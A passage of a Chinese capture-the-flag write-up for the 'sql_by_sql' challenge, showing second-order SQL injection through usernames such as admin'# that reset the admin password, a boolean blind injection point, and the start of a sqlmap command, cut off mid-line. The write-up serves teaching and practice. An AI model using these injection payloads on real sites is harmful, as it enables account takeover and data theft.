[NSSRound#1 Basic]sql_by_sql - 二次注入+布尔盲注||sqlmap

一、思路分析

进入注册界面后
　　假设sql：update user set password = ‘’ where username = ‘’ and password = ‘’
　　　　此时如果我们注册的用户名是admin’–+、admin’#、admin’–的话
　　update user set password = ‘123’ where username = ‘admin’#’ and password = ‘’

1、所以先注册名为：admin’–+的用户，这样就可以直接修改admin密码，登录后，获取cookie
2、用户界面提供查询功能，但是只能查有或没有该用户，而且不会出现报错，说明是sqllite数据库

二、解题方法

方法一：sqlmap
尝试利用sqlmap爆破，因为查询是在query层次，且是post，所以我们的sqlmap代码如下：
py sqlmap.py -u "http://node4.anna.nss